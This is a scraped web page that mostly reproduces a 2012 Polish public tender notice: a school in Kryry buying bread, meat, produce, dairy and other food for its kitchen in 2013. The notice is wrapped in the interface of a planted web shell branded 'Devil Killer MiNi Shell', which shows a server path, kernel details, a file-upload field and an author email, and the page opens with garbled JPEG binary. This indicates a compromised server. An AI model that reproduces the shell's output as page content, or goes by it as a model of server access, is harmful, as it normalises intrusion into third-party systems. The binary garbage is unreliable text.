JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121203/486228-N-2012.html

<p class="kh_header"><b>Kryry: Zakup środków żywieniowych wraz z dostawą na potrzeby kuchni szkolnej w Zespole Szkolno - Przedszkolnym w Kryrach na 2013 rok</b><br>
<b>Numer ogłoszenia: 486228 - 2012; data zamieszczenia: 03.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkolno-Przedszkolny w Kryrach , ul. Nierad 86, 43-265 Kryry, woj. śląskie, tel. 32 212 22 13, faks 32 212 22 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zspkryry.edupage.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostak budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup środków żywieniowych wraz z dostawą na potrzeby kuchni szkolnej w Zespole Szkolno - Przedszkolnym w Kryrach na 2013 rok.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zakup środków żywieniowych wraz z dostawą na potrzeby kuchni szkolnej w Zespole Szkolno - Przedszkolnym w Kryrach na 2013 rok, tj.  od 02.01.2013r. do 31.12.2013r.

2. Szczegółowy wykaz artykułów żywnościowych z podziałem na poszczególne części, wraz z ich rocznym zapotrzebowaniem zawarto w załącznikach do SIWZ. Ustala się 7 części podlegających zamówieniu. Wykonawca może złożyć ofertę na całość zamówienia, poszczególną część lub na wybrane części:

1)   Część I - Pieczywo, świeże wyroby piekarskie i ciastkarskie
2)   Część II - Mięso, wędliny i wyroby mięsne
3)   Część III - Drób
4)   Część IV - Ryby
      5)   Część V - Warzywa, owoce i przetwory
6)   Część VI - Produkty mleczarskie, tłuszcze zwierzęce i roślinne, 
7)   Część VII -Różne produkty spożywcze.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.80.00.00-6, 15.60.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz co najmniej jednej dostawy o wartości powyżej 10 000,00 zł wykonanej w danym roku,  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, zrealizowanej w okresie ostatnich 3 lat przed upływem terminu składania ofert (w przypadku świadczeń okresowych lub ciągłych mogą to być również dostawy wykonywane), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie - Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dysponowania odpowiednim potencjałem technicznym Wykonawca powinien przedłożyć zamawiającemu wykaz sprzętu transportowego przystosowanego do przewożenia artykułów żywnościowych zgodnie z obowiązującymi przepisami sanitarnymi, zgodnie z załącznikiem nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca powinien przedłożyć zamawiającemu owiadczenie, że osoby które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - Załącznki nr 6 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany treści umowy na podstawie art. 144 ustawy o zamówieniach publicznych, w tym przypadku ustawowej stawki VAT, jednak w sytuacji łącznego spełnienia 2 przesłanek: a) gdy istnieje obiektywna konieczność wprowadzenia zmian, np. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu art.357Kc. b) zmiana wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zspkryry.edupage.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> sekretariat Zespołu Szkolno - Przedszkolnego w Kryrach, w godzinach od 7:00 do 15:00; ul. Nierad 86, Kryry.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2012 godzina 09:00, miejsce: sekretariat Zespołu Szkolno - Przedszkolnego w Kryrach,  ul. Nierad 86, Kryry.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO, ŚWIEŻE WYROBY PIEKARSKIE I CIASTKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb duży biały  krojony
1000 g	kg	750
chleb wieloziarnisty mały 600g krojony	szt.	150
bułka biała mała 50g	szt.	1500
bułka graham duża 100 g	szt.	500
bułka biała duża 100g	szt.	5000
kołaczyk z nadzieniem owocowym lub makowym 120g	szt.	500
rogal maślany 100g	szt.	1100
wek 400g krojony	szt.	500
pączek nadziewany 100g	szt.	300
babka piaskowa 400g	szt.	150
bułka tarta	kg	150
kołacz z serem lub jabłkami	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MIĘSO , WĘDLINY I WYROBY MIĘSNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek wędzony	kg	180
schab z kością	kg	400
łopatka b/k	kg	1000
mięso mielone	kg	250
udziec wieprzowy	kg	350
kości wieprzowe	kg	100
kiełbaski firmowe cienkie 	kg	100
kiełbaski litewskie	kg	200
mortadela	kg	20
szynka sopocka	kg	60
szynka wieprzowa gotowana	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z kurczaka	kg	400
Kurczak cały	kg	300
Porcje rosołowe	kg	200
Udka z kurczaka - ćwiartka	kg	600
Wątróbka drobiowa	kg	120
szynka królewska	kg	50
Szynka z puszki premium	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.21.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet - tilapia IQF	kg	250
filet - panga IQF	kg	200
filet  - morszczuk IQF	kg	100
filet  - sola IQF	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> WARZYWA , OWOCE I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> fasola kolorowa		kg	50
fasola Jaś		kg	100
groszek konserwowy 400 g 		szt.	150
groch łuskany		kg	80
jabłka		kg	1000
kalarepka		szt.	50
kapusta biała		kg	800
kapusta czerwona		kg	300
kapusta młoda		szt.	100
kapusta kiszona		kg	500
koperek zielony		pęczek	250
ogórek zielony		kg	100
ogórek konserwowy 1000g		szt.	350
ogórek kiszony		kg	100
pomidor		kg	80
pietruszka zielona		pęczek	200
pietruszka korzeń		kg	200
pieczarki		kg	70
seler		kg	200
ziemniaki		kg	5000
mandarynki 		kg	100
brzoskwinia puszka 825g		szt.	100
pomarańcze		kg	250
banany		kg	700
dżem truskawkowy 280 g (nie mniej niż 40g owoców na 100g dżemu)		szt.	150
dżem brzoskwiniowy 280g (nie mniej niż 40g owoców na 100g dżemu)		szt.	100
mrożonka - kalafior różyczki 2,5 kg		szt.	50
mrożonka - brokuł 2,5 kg		szt.	25
mrożonka - fasolka zielona 2,5 kg		szt.	25
mrożonka kompot  6 składników 500g		szt.	60
mrożonka - frytki 1000g		szt.	250
pieczarki konserwowe 1000g		szt.	20
papryka konserwowa 900 ml		szt.	50
cebula		kg	200
buraki czerwone		kg	250
marchew		kg	500
sałatki warzywne  konserwowe 900 ml (obiadowa, szwedzka, domowa)		szt.	100
kalafior świeży		szt.	50
kapusta pekińska		szt.	150
brokuł świeży		szt.	50
czosnek		szt.	50
gruszka		kg	400
sałata zielona		szt.	30
por		szt.	50
arbuz		kg	300
cytryny		kg	10
nektaryny		kg	150
szczypiorek		pęczek	40
sałatka z czerwonych buraków - słoik 900 ml		szt.	200
sałatka z kapusty czerwonej z jabłkami słoik 710 ml		szt.	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PRODUKTY MLECZARSKIE, TŁUSZCZE ZWIERZĘCE I ROŚLINNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jogurt  z owocami 150 g 		szt.	2000
mleko 3,2%   1 litr
karton		szt.	900
masło ekstra  200g 82% tłuszczu		szt.	1200
margaryna mleczna z mlekiem 250 g 		szt.	800
majonez - 320ml +/- 5% -słoik 
(Winiary, Kielecki, Napoleoński, Hellmans) 		szt.	50
serek topiony typu tylżycki  100 g		szt.	200
serek homogenizowany  150 g wanilia, owocowy - różne smaki 		szt.	3000
ser gouda		kg	70
śmietana 18% 500g		szt.	150
deser mleczny z czekoladą i orzechami 4 x 100g		szt.	2100
twaróg półtłusty		kg	100
jogurt naturalny z ziarnami zbóż 175 g z żywymi kulturami bakterii		szt.	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> budyń waniliowy z cukrem opakowanie 60g 
o składzie: cukier, skrobia ziemniaczana, skrobia kukurydziana. aromat, barwniki:żółcień pomarańczowa, żółcień chinolinowa		szt.	400
cynamon mielony saszetka15g		szt.	60
cukier biały op. 1 kg		kg	1800
fix do spaghetti bolognese		szt.	50
galaretka owocowa 75g różne smaki		szt.	100
herbata Minutka lub równoważna op. 100 szt.		szt.	400
przyprawa sucha warzywna do zup, potraw mięsnych i ryb; skład: warzywa suszone (15,1% ): marchew, cebula, pasternak, seler, natka pietruszki, por; substancje wzmcniające smak i zapach: glutaminian sodu, inozynian dwusodowy, guanylan dwusodowy; cukier, pieprz czarny, ekstrakt drożdżowy, barwnik: ryboflawina. Opakow. 200g		szt.	200
kawa typu inka 150g		szt.	45
kasza manna		kg	50
kasza jęczmienna wiejska 1 kg		kg	150
napój kakaowy instant z witaminami i wapniem. Opakowanie - 700g		szt.	20
liść laurowy 7g		szt.	20
majeranek 8g		szt.	70
mąka pszenna poznańska typ 500		kg	450
mąka ziemniaczana 1000g		kg	100
musztarda 1000g w tubie		szt.	10
makaron gruby świderki 1000g skład: 100%semoliny, woda		szt.	300
makaron gruby wstążki  1000g skład: 100%semoliny, woda		szt.	200
makaron gwiazdki drobne 250 g
5-cio jajeczny		szt.	50
makaron spaghetti  500g , skład: 100% mąki z pszenicy durum o najwyższej jakości, woda		szt.	250
makaron nitki 250g  2-jajeczny		szt.	200
krem czekoladowy do smarowania z orzechami laskowymi 130g		szt.	70
olej rzepakowy z pierwszego tłoczenia  op. 3000 ml		szt.	150
ocet 10% 500 ml		szt.	20
papryka mielona    20 g		szt.	200
płatki śniadaniowe kukurydziane 500 g 		szt.	60
płatki śniadaniowe miodowe  500 g 		szt.	60
płatki śniadaniowe czekoladowe 500g 		szt.	30
pieprz mielony czarny 20g		szt.	100
pasztet drobiowy konserwa 160g		szt.	150
przyprawa płynna wieloskładnikowa 960 g		szt.	25
ryż op. 1000g		kg	130
napój niegazowany wieloowocowy na bazie marchewki 150 g opakowanie typu piramidka ze słomką		szt.	1500
Sok malinowy wysokosłodzony. Ekstrakt minimum 65%. Wyprodukowano z soku zagęszczonego. Pasteryzowany. Słodzony430 ml 		szt.	50
Sok pomarańczowy wysokosłodzony. Ekstrakt minimum 65%. Wyprodukowano z soku zagęszczonego. Pasteryzowany. Słodzony ml		szt.	600
sól		kg	200
ziele angielskie 15g		szt.	20
żurek śląski 450g kubek		szt.	200
barszcz czerwony - koncentrat barszczu z buraków ćwikłowych bez konserwantów 300 ml (380g) w butelce szklanej 		szt.	40
miód prawdziwy kwiatowy 400g		szt.	30
jajka duże - L lub XL		szt.	8000
kartacze mrożone z mięsem 		kg	400
knedle z truskawkami 		kg	250
koncentrat pomidorowy 30% bez dodatków 1000g 		szt.	100
ketchup łagodny 500 g 		szt.	150
uszka z grzybami 250g		szt.	20
Woda mineralna niegazowana, butelka 5 l o średnim stopniu  mineralizacji i niskiej zawartości sodu		szt.	150
Ciastka z pięcioma rodzajami zbóż (71% zbóż, w tym 20% pełnego ziarna) w opakowaniach 300 g (6 x 4 ciastka) różne smaki		szt.	250
Śledź w puszce masa netto 170 g		szt.	40
Śledź w puszce w pomidorach  masa netto 170 g		szt.	40
Czekolada mleczna o wadze 100 g (skład: cukier, tłuszcz kakaowy, mleko pełne w proszku, miazga kakaowa, serwatka w proszku, laktoza i białka mleka, miazga z orzechów laskowych, tłuszcz mleczny, emulgator (lecytyna sojowa), aromat; masy kakaowej min. 30% a mlecznej min. 15%.		szt.	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com